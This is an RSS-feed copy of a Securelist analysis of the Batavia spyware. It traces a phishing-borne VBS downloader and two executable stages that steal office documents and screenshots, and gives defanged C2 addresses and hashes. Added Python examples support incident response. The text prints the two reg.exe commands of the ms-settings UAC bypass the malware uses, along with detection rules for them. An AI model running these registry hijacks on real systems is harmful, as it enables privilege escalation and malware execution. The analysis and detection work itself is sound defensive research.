<comments>https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/#respond</comments>
<dc:creator><![CDATA[Kaspersky]]></dc:creator>
<pubDate>Mon, 07 Jul 2025 10:00:26 +0000</pubDate>
<category><![CDATA[Malware descriptions]]></category>
<category><![CDATA[Malware Technologies]]></category>
<category><![CDATA[Microsoft Windows]]></category>
<category><![CDATA[Targeted attacks]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[Spyware]]></category>
<category><![CDATA[Spear phishing]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[PowerShell]]></category>
<category><![CDATA[Data theft]]></category>
<category><![CDATA[VBS]]></category>
<category><![CDATA[Windows malware]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116866</guid>
<description><![CDATA[Kaspersky experts have discovered a new spyware called Batavia, which steals data from corporate devices.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
<p>Since early March 2025, our systems have recorded an increase in detections of similar files with names like <code>договор-2025-5.vbe</code>, <code>приложение.vbe</code>, and <code>dogovor.vbe</code> (translation: contract, attachment) among employees at various Russian organizations. The targeted attack begins with bait emails containing malicious links, sent under the pretext of signing a contract. The campaign began in July 2024 and is still ongoing at the time of publication. The main goal of the attack is to infect organizations with the previously unknown Batavia spyware, which then proceeds to steal internal documents. The malware consists of the following malicious components: a VBS script and two executable files, which we describe in this article. Kaspersky solutions detect these components as <code>HEUR:Trojan.VBS.Batavia.gen</code> and <code>HEUR:Trojan-Spy.Win32.Batavia.gen</code>.</p>
<h2 id="first-stage-of-infection-vbs-script">First stage of infection: VBS script</h2>
<p>As an example, we examined one of the emails users received in February. According to our research, the theme of these emails has remained largely unchanged since the start of the campaign.</p>
<div id="attachment_116869" style="width: 1230px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116869" class="size-full wp-image-116869" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1.png" alt="Example of an email with a malicious link" width="1220" height="904" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1.png 1220w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-300x222.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-1024x759.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-768x569.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-472x350.png 472w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-740x548.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-378x280.png 378w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04222907/batavia-spyware1-800x593.png 800w" sizes="auto, (max-width: 1220px) 100vw, 1220px" /></a><p id="caption-attachment-116869" class="wp-caption-text">Example of an email with a malicious link</p></div>
<p>In this email, the employee is asked to download a contract file supposedly attached to the message. In reality, the "attachment" is a malicious link: <code>https://oblast-ru[.]com/oblast_download/?file=hc1-[redacted]</code>.</p>
<p>Notably, the sender’s address belongs to the same domain – <code>oblast-ru[.]com</code>, which is owned by the attackers. We also observed that the <code>file=hc1-[redacted]</code> argument is unique for each email and is used in subsequent stages of the infection, which we’ll discuss in more detail below.</p>
<p>When the link is clicked, an archive is downloaded to the user’s device, containing just one file: the script <code>Договор-2025-2.vbe</code>, encrypted using Microsoft’s proprietary algorithm (MD5: 2963FB4980127ADB7E045A0F743EAD05).</p>
<div id="attachment_116870" style="width: 694px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116870" class="size-full wp-image-116870" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2.png" alt="Snippet of the malicious script after decryption" width="684" height="332" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2.png 684w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2-300x146.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223000/batavia-spyware2-577x280.png 577w" sizes="auto, (max-width: 684px) 100vw, 684px" /></a><p id="caption-attachment-116870" class="wp-caption-text">Snippet of the malicious script after decryption</p></div>
<p>The script is a downloader that retrieves a specially crafted string of 12 comma-separated parameters from the hardcoded URL <code><strong>https://oblast-ru[.]com/oblast_download/?file=hc1-[redacted]</strong>&vput2</code>. These parameters are arguments for various malicious functions. For example, the script identifies the OS version of the infected device and sends it to the attackers’ C2 server.</p>
<table>
<tbody>
<tr>
<td>#</td>
<td>Value</td>
<td>Description</td>
</tr>
<tr>
<td>1</td>
<td><code>\WebView.exe</code></td>
<td>Filename to save</td>
</tr>
<tr>
<td>2</td>
<td><code>Select * from Win32_OperatingSystem</code></td>
<td>Query to determine OS version and build number</td>
</tr>
<tr>
<td>3</td>
<td><code>Windows 11</code></td>
<td>OS version required for further execution</td>
</tr>
<tr>
<td>4</td>
<td><code>new:c08afd90-f2a1-11d1-8455-00a0c91f3880</code></td>
<td><code>ShellBrowserWindow</code> object ID, used to open the downloaded file via the <code>Navigate()</code> method</td>
</tr>
<tr>
<td>5</td>
<td><code>new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B</code></td>
<td><code>WScript.Shell</code> object ID,<br />
used to run the file via the <code>Run()</code> method</td>
</tr>
<tr>
<td>6</td>
<td><code>winmgmts:\\.\root\cimv2</code></td>
<td>WMI path used to retrieve OS version and build number</td>
</tr>
<tr>
<td>7</td>
<td><code>77;90;80;0</code></td>
<td>First bytes of the downloaded file</td>
</tr>
<tr>
<td>8</td>
<td><code>&dd=d</code></td>
<td>Additional URL arguments for file download</td>
</tr>
<tr>
<td>9</td>
<td><code>&i=s</code></td>
<td>Additional URL arguments for sending downloaded file size</td>
</tr>
<tr>
<td>10</td>
<td><code>&i=b</code></td>
<td>Additional URL arguments for sending OS build number</td>
</tr>
<tr>
<td>11</td>
<td><code>&i=re</code></td>
<td>Additional URL arguments for sending error information</td>
</tr>
<tr>
<td>12</td>
<td><code>\winws.txt</code></td>
<td>Empty file that will also be created on the device</td>
</tr>
</tbody>
</table>
<p>By accessing the address <code><strong>https://oblast-ru[.]com/oblast_download/?file=hc1-[redacted]</strong>&dd=d</code>, the script downloads the file <code>WebView.exe</code> (MD5: 5CFA142D1B912F31C9F761DDEFB3C288) and saves it to the <code>%TEMP%</code> directory, then executes it. If the OS version cannot be retrieved or does not match the one obtained from the C2 server, the downloader uses the <code>Navigate()</code> method; otherwise, it uses <code>Run()</code>.</p>
<h2 id="second-stage-of-infection-webview-exe">Second stage of infection: WebView.exe</h2>
<p><code>WebView.exe</code> is an executable file written in Delphi, with a size of 3,235,328 bytes. When launched, the malware downloads content from the link <code><strong>https://oblast-ru[.]com/oblast_download/?file=</strong>1<strong>hc1-[redacted]&view</strong></code> and saves it to the directory <code>C:\Users\[username]\AppData\Local\Temp\WebView</code>, after which it displays the downloaded content in its window. At the time of analysis, the link was no longer active, but we assume it originally hosted the fake contract mentioned in the malicious email.</p>
<p>At the same time as displaying the window, the malware begins collecting information from the infected computer and sends it to an address with a different domain, but the same infection ID: <code><strong>https://ru-exchange[.]com/mexchange/?file=</strong>1<strong>hc1-[redacted]</strong></code>. The only difference from the ID used in the VBS script is the addition of the digit 1 at the beginning of the argument, which may indicate the next stage of infection.</p>
<p>The spyware collects several types of files, including various system logs and office documents found on the computer and removable media. Additionally, the malicious module periodically takes screenshots, which are also sent to the C2 server. To avoid sending the same files repeatedly, the malware creates a file named <code>h12</code> in the <code>%TEMP%</code> directory and writes a 4-byte FNV-1a_32 hash of the first 40,000 bytes of each uploaded file. If the hash of any subsequent file matches a value in h12, that file is not sent again.</p>
<table>
<tbody>
<tr>
<td>Type</td>
<td>Full path or mask</td>
</tr>
<tr>
<td>Pending file rename operations log</td>
<td>c:\windows\pfro.log</td>
</tr>
<tr>
<td>Driver install and update log</td>
<td>c:\windows\inf\setupapi.dev.log</td>
</tr>
<tr>
<td>System driver and OS component install log</td>
<td>c:\windows\inf\setupapi.setup.log</td>
</tr>
<tr>
<td>Programs list</td>
<td>Directory listing of c:\program files*</td>
</tr>
<tr>
<td>Office documents</td>
<td>*.doc, *.docx, *.ods, *.odt, *.pdf, *.xls, *.xlsx</td>
</tr>
</tbody>
</table>
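<p>The <code>h12</code> deduplication file described above is useful to incident responders: every 4-byte entry is the FNV-1a_32 hash of the first 40,000 bytes of a file the malware has already uploaded, so a recovered <code>h12</code> can be matched against files on the host to scope what was exfiltrated. The following is an added example written for this purpose; it is not code from the article or from the malware. The byte order of the stored entries and the absence of any file header are assumptions, as is the sample data, which is constructed here.</p>

```python
"""Rebuild Batavia's h12 fingerprints and match them against local files.

Added example, not code from the Securelist article or from the malware.
Assumptions (not stated on the page): each 4-byte FNV-1a_32 hash is stored
little-endian, and h12 holds the hashes back to back with no header.
"""
from __future__ import annotations

from pathlib import Path

FNV32_OFFSET = 0x811C9DC5
FNV32_PRIME = 0x01000193
FINGERPRINT_LEN = 40_000  # the malware hashes only the first 40,000 bytes


def fnv1a32(data: bytes) -> int:
    """Standard 32-bit FNV-1a over the given bytes."""
    h = FNV32_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV32_PRIME) & 0xFFFFFFFF
    return h


def fingerprint(data: bytes) -> int:
    """Hash the way the article describes: FNV-1a_32 of the first 40,000 bytes."""
    return fnv1a32(data[:FINGERPRINT_LEN])


def parse_h12(blob: bytes, byteorder: str = "little") -> set[int]:
    """Split a recovered h12 file into its 4-byte hash entries.

    The byte order is an assumption; try "big" if a known-exfiltrated file
    fails to match.
    """
    if len(blob) % 4:
        raise ValueError("h12 length is not a multiple of 4 bytes")
    return {int.from_bytes(blob[i:i + 4], byteorder) for i in range(0, len(blob), 4)}


def files_already_uploaded(h12_blob: bytes, files: dict[str, bytes],
                           byteorder: str = "little") -> list[str]:
    """Return the names of candidate files whose fingerprint appears in h12.

    A match means the malware recorded that file as sent to the C2 server,
    which is what an IR team needs in order to scope the data loss.
    """
    seen = parse_h12(h12_blob, byteorder)
    return sorted(name for name, data in files.items() if fingerprint(data) in seen)


def build_h12(files: list[bytes], byteorder: str = "little") -> bytes:
    """Construct an h12 blob from sample contents (used only for the test data)."""
    return b"".join(fingerprint(d).to_bytes(4, byteorder) for d in files)


def scan_directory(h12_path: str, root: str) -> list[str]:
    """Convenience wrapper: compare every file under root against a recovered h12."""
    h12 = Path(h12_path).read_bytes()
    files = {str(p): p.read_bytes() for p in Path(root).rglob("*") if p.is_file()}
    return files_already_uploaded(h12, files)


# Constructed sample data: two "documents" the malware sent, one it did not.
SAMPLE_FILES = {
    "contract.docx": b"PK\x03\x04constructed sample document A" * 2000,  # > 40,000 bytes
    "budget.xlsx": b"PK\x03\x04constructed sample document B",
    "notes.txt": b"constructed sample that was never uploaded",
}
SAMPLE_H12 = build_h12([SAMPLE_FILES["contract.docx"], SAMPLE_FILES["budget.xlsx"]])

if __name__ == "__main__":
    print(files_already_uploaded(SAMPLE_H12, SAMPLE_FILES))
```

<p>Because only the first 40,000 bytes are hashed, a large document that was modified after the upload still matches if the change lies beyond that prefix; conversely, a file that differs in its prefix from the copy the malware saw (for example after re-saving) will not match, so absence from <code>h12</code> is not proof that a file was never sent.</p>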
<p>In addition, <code>WebView.exe</code> downloads the next-stage executable from <code><strong>https://oblast-ru[.]com/oblast_download/?file=</strong>1<strong>hc1-[redacted]</strong>&de</code> and saves it to <code>%PROGRAMDATA%\jre_22.3\javav.exe</code>. To execute this file, the malware creates a shortcut in the system startup folder: <code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\Jre22.3.lnk</code>. This shortcut is triggered upon the first device reboot after infection, initiating the next stage of malicious activity.</p>
<h2 id="third-stage-of-infection-javav-exe">Third stage of infection: javav.exe</h2>
<p>The executable file <code>javav.exe</code> (MD5: 03B728A6F6AAB25A65F189857580E0BD) is written in C++, unlike <code>WebView.exe</code>. The malicious capabilities of the two files are largely similar; however, <code>javav.exe</code> includes several new functions.</p>
<p>For example, <code>javav.exe</code> collects files using the same masks as <code>WebView.exe</code>, but the list of targeted file extensions is expanded to include these formats:</p>
<ul>
<li>Image and vector graphic: *.jpeg, *.jpg, *.cdr</li>
<li>Spreadsheets: *.csv</li>
<li>Emails: *.eml</li>
<li>Presentations: *.ppt, *.pptx, *.odp</li>
<li>Archives: *.rar, *.zip</li>
<li>Other text documents: *.rtf, *.txt</li>
</ul>
<p>Like its predecessor, the third-stage module compares the hash sums of the obtained files to the contents of the <code>h12</code> file. The newly collected data is sent to <code><strong>https://ru-exchange[.]com/mexchange/?file=</strong>2<strong>hc1-[redacted]</strong></code>.<br />
Note that at this stage, the digit 2 has been added to the infection ID.</p>
<p>Additionally, two new commands appear in the malware’s code: <code>set</code> to change the C2 server and <code>exa/exb</code> to download and execute additional files.</p>
<p>In a separate thread, the malware regularly sends requests to <code><strong>https://ru-exchange[.]com/mexchange/?</strong>set<strong>&file=</strong>2<strong>hc1-[redacted]&data=[xxxx]</strong></code>, where <code>[xxxx]</code> is a randomly generated 4-character string. In response, javav.exe receives a new C2 address, encrypted with a 232-byte XOR key, which is saved to a file named <code>settrn.txt</code>.</p>
<p>In another thread, the malware periodically connects to <code><strong>https://ru-exchange[.]com/mexchange/?</strong>exa<strong>&file=</strong>2<strong>hc1-[redacted]&data=[xxxx]</strong></code> (where <code>[xxxx]</code> is also a string of four random characters). The server responds with a binary executable file, encrypted using a one-byte XOR key <code>7A</code> and encoded using Base64. After decoding and decryption, the file is saved as <code>%TEMP%\windowsmsg.exe</code>. In addition to this, <code>javav.exe</code> sends requests to <code><strong>https://ru-exchange[.]com/mexchange/?</strong>exb<strong>&file=</strong>2<strong>hc1-[redacted]&data=[xxxx]</strong></code>, asking for a command-line argument to pass to <code>windowsmsg.exe</code>.</p>
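<p>An analyst who has a captured <code>exa</code> response (from a proxy log or a network capture) can recover the delivered binary for hashing and sandboxing by reversing the two layers the article describes: Base64, then a one-byte XOR with <code>7A</code>. The decoder below is an added example, not code from the article or from the malware; the check on the leading bytes reuses the <code>77;90;80;0</code> value from the first-stage parameter table, and the sample response is constructed here rather than taken from a real capture.</p>

```python
"""Decode a captured 'exa' response from Batavia's C2 for analyst triage.

Added example, not code from the article or from the malware. The encoding
(Base64 over a stream XORed with the single byte 0x7A) and the expected
leading bytes 77;90;80;0 are taken from the article; the sample response
below is constructed here, not a real capture.
"""
from __future__ import annotations

import base64
import binascii
import hashlib

XOR_KEY = 0x7A
MZ_HEADER = bytes([77, 90, 80, 0])  # "MZ\x90\x00", the value the VBS stage checks for


def decode_exa_response(body: bytes) -> bytes:
    """Base64-decode the response body and strip the one-byte XOR layer."""
    try:
        raw = base64.b64decode(body, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"response is not valid Base64: {exc}") from exc
    return bytes(b ^ XOR_KEY for b in raw)


def looks_like_pe(payload: bytes) -> bool:
    """Cheap sanity check: does the decoded blob start with the expected DOS header?"""
    return payload[:4] == MZ_HEADER


def triage(body: bytes) -> dict:
    """Decode and summarize: size, header check, and hashes for IoC sharing."""
    payload = decode_exa_response(body)
    return {
        "size": len(payload),
        "is_pe": looks_like_pe(payload),
        "md5": hashlib.md5(payload).hexdigest(),
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


def _encode_sample(payload: bytes) -> bytes:
    """Inverse transform, used only to build the constructed sample below."""
    return base64.b64encode(bytes(b ^ XOR_KEY for b in payload))


# Constructed stand-in for a downloaded executable: a DOS header plus filler.
SAMPLE_PAYLOAD = MZ_HEADER + b"\x00" * 60 + b"constructed sample, not a real binary"
SAMPLE_RESPONSE = _encode_sample(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    print(triage(SAMPLE_RESPONSE))
```

<p>If the header check fails on a real capture, the body was most likely truncated or the server returned an error page rather than a binary; the function raises on malformed Base64 instead of silently producing garbage.</p>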
<p>To launch <code>windowsmsg.exe</code>, the malware uses a UAC bypass technique (<a href="https://attack.mitre.org/techniques/T1548/002/" target="_blank" rel="noopener">T1548.002</a>) involving the built-in Windows utility <code>computerdefaults.exe</code>, along with modification of two registry keys using the reg.exe utility.</p>
<pre class="urvanov-syntax-highlighter-plain-tag">add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f</pre>
<pre class="urvanov-syntax-highlighter-plain-tag">add HKCU\Software\Classes\ms-settings\Shell\Open\command /f /ve /t REG_SZ /d "%temp%\windowsmsg.exe <arg>"</pre>
<p>At the time of analysis, downloading <code>windowsmsg.exe</code> from the C2 server was no longer possible. However, we assume that this file serves as the payload for the next stage – most likely containing additional malicious functionality.</p>
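<p>Both registry writes shown above are easy to catch in process-creation telemetry, since they go through <code>reg.exe</code> with the <code>ms-settings\Shell\Open\command</code> key on the command line. The detector below is an added example, not code from the article; it runs over constructed process-creation records in the shape many EDR and Sysmon pipelines emit, and the field names (<code>image</code>, <code>parent_image</code>, <code>command_line</code>) as well as the parent-process heuristic for <code>computerdefaults.exe</code> are assumptions of this example.</p>

```python
"""Flag the registry writes behind the computerdefaults.exe UAC bypass.

Added example, not code from the article. It runs over constructed
process-creation records (image, parent image, command line); the field
names and the parent-process heuristic are assumptions of this example.
"""
from __future__ import annotations

import re

# The key both reg.exe commands on the page write to, in either hive spelling.
MS_SETTINGS_KEY = re.compile(
    r"(hkcu|hkey_current_user)\\software\\classes\\ms-settings\\shell\\open\\command",
    re.IGNORECASE,
)
# Value names used by the bypass: DelegateExecute and the (default) value (/ve).
SUSPICIOUS_VALUE = re.compile(r"(/v\s+delegateexecute|/ve)(\s|$)", re.IGNORECASE)


def is_ms_settings_hijack(command_line: str) -> bool:
    """True for a reg add that plants a handler under the ms-settings key."""
    cl = " ".join(command_line.split())  # collapse odd whitespace before matching
    return bool(MS_SETTINGS_KEY.search(cl) and SUSPICIOUS_VALUE.search(cl))


def evaluate(event: dict) -> list[str]:
    """Return the names of the rules the event trips (empty list when clean)."""
    hits = []
    image = event.get("image", "").lower()
    parent = event.get("parent_image", "").lower()
    cmd = event.get("command_line", "")
    if image.endswith("\\reg.exe") and is_ms_settings_hijack(cmd):
        hits.append("ms-settings handler written via reg.exe")
    # Heuristic (assumption): computerdefaults.exe is normally started from
    # Explorer, so a script host or an unknown binary as parent deserves a look.
    if image.endswith("\\computerdefaults.exe") and not parent.endswith("\\explorer.exe"):
        hits.append("computerdefaults.exe started by unexpected parent")
    return hits


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and rule names of every event that trips at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]


# Constructed sample telemetry; the first two command lines mirror the page.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\reg.exe", "parent_image": r"C:\ProgramData\jre_22.3\javav.exe",
     "command_line": r'add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f'},
    {"image": r"C:\Windows\System32\reg.exe", "parent_image": r"C:\ProgramData\jre_22.3\javav.exe",
     "command_line": r'add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command /f /ve /t REG_SZ /d "C:\Users\victim\AppData\Local\Temp\windowsmsg.exe abc"'},
    {"image": r"C:\Windows\System32\reg.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"image": r"C:\Windows\System32\computerdefaults.exe", "parent_image": r"C:\ProgramData\jre_22.3\javav.exe",
     "command_line": "computerdefaults.exe"},
    {"image": r"C:\Windows\System32\computerdefaults.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "computerdefaults.exe"},
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(index, rules)
```

<p>The first rule is high-confidence on its own, because legitimate software has no reason to register an <code>ms-settings</code> handler under the current user's <code>Classes</code> hive; the second rule is a heuristic and is best used to enrich the first rather than to alert by itself.</p>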
<h2 id="victims">Victims</h2>
<p>The victims of the Batavia spyware campaign were Russian industrial enterprises. According to our telemetry data, more than 100 users across several dozen organizations received the bait emails.</p>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of infections via VBS scripts, August 2024 – June 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223519/batavia-spyware3.png" target="_blank" rel="noopener">download</a>)</em></p>
<h2 id="conclusion">Conclusion</h2>
<p>Batavia is a new spyware that emerged in July 2024, targeting organizations in Russia. It spreads through malicious emails: by clicking a link disguised as an official document, unsuspecting users download a script that initiates a three-stage infection process on their device. As a result of the attack, Batavia exfiltrates the victim’s documents, as well as information such as a list of installed programs, drivers, and operating system components.</p>
<p>To avoid falling victim to such attacks, organizations must take a comprehensive approach to infrastructure protection, employing a suite of security tools that include threat hunting, incident detection, and response capabilities. <a href="https://www.kaspersky.com/enterprise-security/xdr/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___xdr____ce00c376fedd13b4" target="_blank" rel="noopener">Kaspersky Next XDR Expert</a> is a solution for organizations of all sizes that enables flexible, effective workplace security. It’s also worth noting that the initial infection vector in this campaign is bait emails. This highlights the importance of regular employee training and raising awareness of corporate cybersecurity practices. We recommend specialized courses available on the <a href="https://www.kaspersky.com/small-to-medium-business-security/security-awareness-platform/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kasap____44cd4ba77be48d65" target="_blank" rel="noopener">Kaspersky Automated Security Awareness Platform</a>, which help reduce employees’ susceptibility to email-based cyberattacks.</p>
<h2 id="indicators-of-compromise">Indicators of compromise</h2>
<p><strong>Hashes of malicious files</strong><br />
Договор-2025-2.vbe<br />
<a href="https://opentip.kaspersky.com/2963fb4980127adb7e045a0f743ead05/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ba8d7aea9ea7311d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2963FB4980127ADB7E045A0F743EAD05</a><br />
webview.exe<br />
<a href="https://opentip.kaspersky.com/5cfa142d1b912f31c9f761ddefb3c288/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______70eaa5d495fab437&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5CFA142D1B912F31C9F761DDEFB3C288</a><br />
javav.exe<br />
<a href="https://opentip.kaspersky.com/03b728a6f6aab25a65f189857580e0bd/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d17d6573529f1af3&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">03B728A6F6AAB25A65F189857580E0BD</a></p>
<p><strong>C2 addresses</strong><br />
<a href="https://opentip.kaspersky.com/oblast-ru.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1b0188aa2ca1241e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">oblast-ru[.]com</a><br />
<a href="https://opentip.kaspersky.com/ru-exchange.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5d424599e89e3523&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ru-exchange[.]com</a></p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>AI and collaboration tools: how cyberattackers are targeting SMBs in 2025</title>
<link>https://securelist.com/smb-threat-report-2025/116830/</link>
<comments>https://securelist.com/smb-threat-report-2025/116830/#respond</comments>
<dc:creator><![CDATA[Kaspersky]]></dc:creator>
<pubDate>Wed, 25 Jun 2025 10:00:12 +0000</pubDate>
<category><![CDATA[Research]]></category>
<category><![CDATA[Adware]]></category>
<category><![CDATA[Malware Statistics]]></category>
<category><![CDATA[Spam Letters]]></category>
<category><![CDATA[Phishing]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Trojan]]></category>
<category><![CDATA[Phishing websites]]></category>
<category><![CDATA[Small and medium-sized business]]></category>
<category><![CDATA[Spam and Phishing]]></category>
<category><![CDATA[Financial threats]]></category>
<category><![CDATA[Potentially Unwanted Applications]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116830</guid>
<description><![CDATA[In its annual SMB threat report, Kaspersky shares insights into trends and statistics on malware, phishing, scams, and other threats to small and medium-sized businesses, as well as security tips.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Cyberattackers often view small and medium-sized businesses (SMBs) as easier targets, assuming their security measures are less robust than those of larger enterprises. In fact, attacks through contractors, also known as <a href="https://securelist.com/trusted-relationship-attack/112731/" target="_blank" rel="noopener"><em>trusted relationship</em> attacks</a>, remain one of the top three methods used to breach corporate networks. With SMBs generally being less protected than large enterprises, this makes them especially attractive to both opportunistic cybercriminals and sophisticated threat actors.</p>
<p>At the same time, AI-driven attacks are becoming increasingly common, making phishing and malware campaigns easier to prepare and quickly adapt, thus increasing their scale. Meanwhile, cybersecurity regulations are tightening, adding more compliance pressure on SMBs.</p>
<p>Improving your security posture has never been more critical. Kaspersky highlights key attack vectors every SMB should be aware of to stay protected.</p>
<h2 id="how-malware-and-potentially-unwanted-applications-puas-are-disguised-as-popular-services">How malware and potentially unwanted applications (PUAs) are disguised as popular services</h2>
<p>Kaspersky analysts have used data from the Kaspersky Security Network (KSN) to explore how frequently malicious and unwanted files and programs are disguised as legitimate applications commonly used by SMBs. The KSN is a system for processing anonymized cyberthreat-related data shared voluntarily by opted-in Kaspersky users. For this research, only data received from the users of Kaspersky solutions for SMBs were analyzed. The research focused on the following applications:</p>
<ul>
<li>ChatGPT</li>
<li>Cisco AnyConnect</li>
<li>Google Drive</li>
<li>Google Meet</li>
<li>DeepSeek</li>
<li>Microsoft Excel</li>
<li>Microsoft Outlook</li>
<li>Microsoft PowerPoint</li>
<li>Microsoft Teams</li>
<li>Microsoft Word</li>
<li>Salesforce</li>
<li>Zoom</li>
</ul>
<p>Between January and April 2025 alone, nearly 8,500 SMB users encountered cyberattacks in which malware or PUAs were disguised as these popular tools.</p>
<p>Among the detected threats, the highest number (1652) of unique malicious and potentially unwanted files mimicked Zoom, the widely used video conferencing platform. This accounted for nearly 41% of all unique files detected, a 14-percentage point increase compared to 2024. Microsoft Office applications remained frequent targets for impersonation: Outlook and PowerPoint each accounted for 16%, Excel for nearly 12%, while Word and Teams made up 9% and 5%, respectively.</p>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share of unique files with names mimicking the nine most popular legitimate applications in 2024 and 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24234859/01-EN-SMB-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>A comparison of the threat landscape in 2024 and 2025 reveals a clear shift: with the growing popularity of AI services, cyberattackers are increasingly disguising malware as various AI tools. According to our analysis, the number of unique malicious files mimicking ChatGPT grew by 115%, reaching 177 in the first four months of 2025. This contributed to a three-percentage-point increase in the tool’s share among the most mimicked applications. DeepSeek, a large language model launched only in 2025, has immediately appeared on the list of impersonated tools.</p>
<p>Another cybercriminal tactic to watch for in 2025 is the growing use of collaboration platform brands to trick users into downloading or launching malware and PUAs. As mentioned above, the share of threats disguised as Zoom increased by 14 percentage points, reaching 1652 unique files, while Microsoft Teams and Google Drive saw increases of over three and one percentage points, respectively, with 206 and 132 cases. This pattern likely reflects the normalization of remote work and geographically distributed teams, which has made these platforms integral to business operations across industries.</p>
<p>Attackers are clearly leveraging the popularity and credibility of these services to increase the success rate of their campaigns.</p>
<table>
<tbody>
<tr>
<td><strong>Malicious file names mimicking popular services </strong></td>
<td><strong>2024</strong></td>
<td><strong>2025</strong></td>
